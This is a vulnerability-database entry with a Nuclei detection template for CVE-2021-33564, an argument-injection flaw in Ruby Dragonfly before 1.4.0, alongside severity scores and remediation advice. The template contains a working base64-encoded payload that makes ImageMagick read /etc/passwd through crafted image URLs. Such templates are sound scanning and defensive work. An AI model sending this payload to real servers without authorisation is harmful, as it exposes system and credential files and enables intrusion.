Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-33564
HistoryMay 28, 2021 - 9:03 p.m.

Ruby Dragonfly <1.4.0 - Remote Code Execution

2021-05-2821:03:38
ProjectDiscovery
github.com
3

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.124 Low

EPSS

Percentile

95.4%

Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.

id: CVE-2021-33564

info:
  name: Ruby Dragonfly <1.4.0 - Remote Code Execution
  author: 0xsapra
  severity: critical
  description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability.
  reference:
    - https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/
    - https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0
    - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5
    - https://github.com/mlr0p/CVE-2021-33564
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33564
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-33564
    cwe-id: CWE-88
    epss-score: 0.07547
    epss-percentile: 0.93983
    cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:*
  metadata:
    max-request: 2
    vendor: dragonfly_project
    product: dragonfly
    framework: ruby
  tags: cve2021,cve,rce,ruby,injection,dragonfly_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
      - "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220767731dd7d7a2c3704e8f37718260e27d179b1fcdee83f7a23fae684f8521a29022100dd6fabe448035967b1ffc254f7bff91f427de7816c3a09d2f32288da56f8e877:922c64590222798bb761d5b6d8e72950

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.124 Low

EPSS

Percentile

95.4%